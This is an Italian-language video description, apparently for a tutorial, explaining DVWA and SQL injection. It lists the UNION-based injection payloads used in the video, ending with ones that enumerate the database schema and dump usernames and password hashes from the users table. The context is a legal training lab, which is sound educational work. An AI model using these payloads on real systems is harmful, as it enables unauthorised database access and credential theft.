Cos'è Damn Vulnerable Web App (DVWA)? Damn Vulnerable Web App (DVWA) è un'applicazione Web PHP / MySQL che è, per l'appunto, dannatamente vulnerabile. DVWA nasce per aiutare i professionisti della sicurezza a testare le proprie competenze e strumenti in un ambiente legale, aiutare gli sviluppatori Web a comprendere meglio i processi di protezione delle applicazioni Web e aiutare studenti e appassionati di sicurezza informatica ad apprendere la sicurezza delle applicazioni Web in un ambiente protetto . Che cos'è una SQL Injection? La SQL Injection è una tecnica utilizzata per attaccare le applicazioni basate sui database. Questo viene fatto includendo porzioni di istruzioni SQL in un campo di immissione nel tentativo di indurre il sito Web a passare un comando SQL malevolo appena formato al database (ad esempio, scaricare il contenuto del database all'attaccante). SQL injection è una tecnica di code injection che sfrutta una vulnerabilità di sicurezza nel software di un'applicazione. La vulnerabilità si verifica quando l'input dell'utente viene filtrato in modo errato per caratteri di escape letterali di stringa incorporati in istruzioni SQL o l'input dell'utente non è fortemente tipizzato ed eseguito in modo imprevisto. L'iniezione SQL è principalmente nota come vettore di attacco per siti Web, ma può essere utilizzata per attaccare qualsiasi tipo di database SQL. COMANDI UTILIZZATI IN QUESTO VIDEO: 1 -1 1.0 1' OR '1'='1 1' OR 1=1# 1' UNION SELECT 1 # 1' UNION SELECT 1, 2# 1' UNION SELECT 1, version() # 1' UNION SELECT 1, user() # 1' UNION SELECT 1, database () # 1' UNION select 1, table_name FROM information_schema.tables WHERE table_schema = 'dvwa'# 1' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name = 'users' # 1' UNION SELECT 1, CONCAT(user_id,':',first_name,':',last_name,':',user,':',password) FROM users# ... https://www.youtube.com/watch?v=HhaTDF4zmtU